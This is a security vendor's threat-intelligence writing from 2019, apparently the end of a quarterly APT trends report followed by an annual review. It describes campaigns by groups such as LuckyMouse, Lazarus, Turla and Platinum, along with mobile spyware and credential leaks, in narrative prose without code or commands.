LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. 
In 2019 we observed ShaggyPanther targeting Windows servers.

## **Middle East**

On August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, "HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.

TortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019.
Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report, during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.

## **Southeast Asia and the Korean Peninsula**

Recently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies.
The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.

We recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Kaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region.
The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.

The Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intention to replace their malware framework with the newly discovered artifacts.

## **Other interesting discoveries**

The well-known Shadow Brokers leak Lost in Translation included an interesting Python script – sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path.
Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

Since the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).

## **Final thoughts**

In seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.

However, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group.
In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.

Korean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.

Despite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

_Source: [APT trends report Q3 2019](<https://securelist.com/apt-trends-report-q3-2019/94530/>), published 2019-10-16._

What were the most interesting developments in terms of APT activity during the year and what can we learn from them?

This is not an easy question to answer, because researchers have only partial visibility and it's impossible to fully understand the motivation for some attacks or the developments behind them.
However, let's try to approach the problem from different angles in order to get a better understanding of what happened, with the benefit of hindsight and perspective.

## Compromising supply chains

Targeting supply chains has proved very successful for attackers in recent years – high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.

In January, we discovered a sophisticated supply-chain attack involving the update utility of a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to the vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses.
You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).

## Disinformation

Q3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, "along with information about their mother and spouse and etc." for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale "highly confidential" information related to MuddyWater.
On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that led us to believe that Sofacy/Hades may be connected to these leaks.

## Lost in Translation and Dark Universe

The well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script – sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system – for example, a file with a unique name or registry path.
Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.

In 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.

The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

## Mobile attacks

Mobile implants are now a standard part of the toolset of many APT groups, and we have seen ample evidence of this during 2019.

In May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this not only to snoop on people's chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit – and that seemed to be that.
However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.

In July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.

In August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor.
According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits – possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received "thousands of visitors per week". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware and keep the exploitation chains up to date for more than two years, show a high level of resources and dedication.

In September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS – the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the V4L2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.

## Established threat actors continue to revamp their tools

While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla.
This is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.

This year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.

We also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a .pdb path left in some of the samples. We believe the same COMpfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all.
Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use the PRNG to generate the 'client random' sequence at the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.

Zebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site.
In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum – one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.

One of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea in an attack that we believe was aimed at stealing application source code.
It's clear that Lazarus keeps updating its tools very quickly.

In Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Andariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly.
The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.

In October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.

The Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette.
The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low-level file-wiping functionality. We observed victims of Silver Lambert in China, in the aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows – including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.

Early in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit.
While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. 
The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.

The Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detection. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.

## Evolution of the 'newcomers'

We first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and – somewhat surprisingly – in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.

In April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, document and cryptography key stealers, and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama, and the targeted computers we found include both packages. We think the attackers used Tokyo as the first-stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This raises the question: why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet.
This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FruityArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.

During February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation do not seem to point to an advanced threat actor.

In February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.

In Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.

## Privacy matters

On January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same marketplace. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).

Stolen credentials, along with other personal information harvested from data leaks, are valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.

We've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of compromising alternative methods of authentication can be much more serious.
